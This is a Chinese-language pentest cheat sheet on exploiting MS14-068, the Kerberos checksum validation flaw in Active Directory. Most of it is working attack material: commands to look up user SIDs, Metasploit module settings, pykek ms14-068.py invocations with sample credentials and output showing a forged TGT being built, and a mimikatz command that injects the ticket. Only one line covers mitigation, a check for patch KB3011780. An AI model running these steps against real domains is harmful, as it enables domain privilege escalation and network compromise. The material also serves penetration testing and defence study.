MS14-068 校验和验证漏洞 (Checksum Validation)

此漏洞利用需要知道用户的 SID，你可以使用 rpcclient 远程获取，或者如果你对目标机器有访问权限，可以使用 wmi。

• RPCClient

rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)

• WMI

wmic useraccount get name,sid
Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
Guest          S-1-5-21-3415849876-833628785-5197346142-501   
Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
Guest          S-1-5-21-297520375-2634728305-5197346142-501   
krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
lambda         S-1-5-21-297520375-2634728305-5197346142-1110 

• Powerview

Convert-NameToSid high-sec-corp.localkrbtgt
S-1-5-21-2941561648-383941485-1389968811-502

• netexec: netexec ldap DC1.lab.local -u username -p password -k --get-sid

文档: https://github.com/gentilkiwi/kekeo/wiki/ms14068

使用 metasploit 或 pykek 生成票据

Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DOMAIN    LABDOMAIN.LOCAL                                yes       域 (大写) 例如: DEMO.LOCAL
   PASSWORD  P@ssw0rd                                       yes       域用户密码
   RHOSTS    10.10.10.10                                    yes       目标地址范围或 CIDR 标识符
   RPORT     88                                             yes       目标端口
   Timeout   10                                             yes       用于建立连接和读取数据的 TCP 超时时间
   USER      lambda                                         yes       域用户
   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       域用户的 SID, 例如: S-1-5-21-1755879683-3641577184-3486455962-1000

# 备用下载地址: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
  [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
  [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
  [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
  [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
  [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!

然后使用 mimikatz 加载票据。

mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"

缓解措施 (Mitigations)

• 确保 DCPromo 过程在运行 DCPromo 之前包含质量保证 (QA) 步骤，该步骤会检查是否安装了 KB3011780。执行此检查的快速简便方法是使用 PowerShell：get-hotfix 3011780

参考资料 (References)

• Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace

Share this content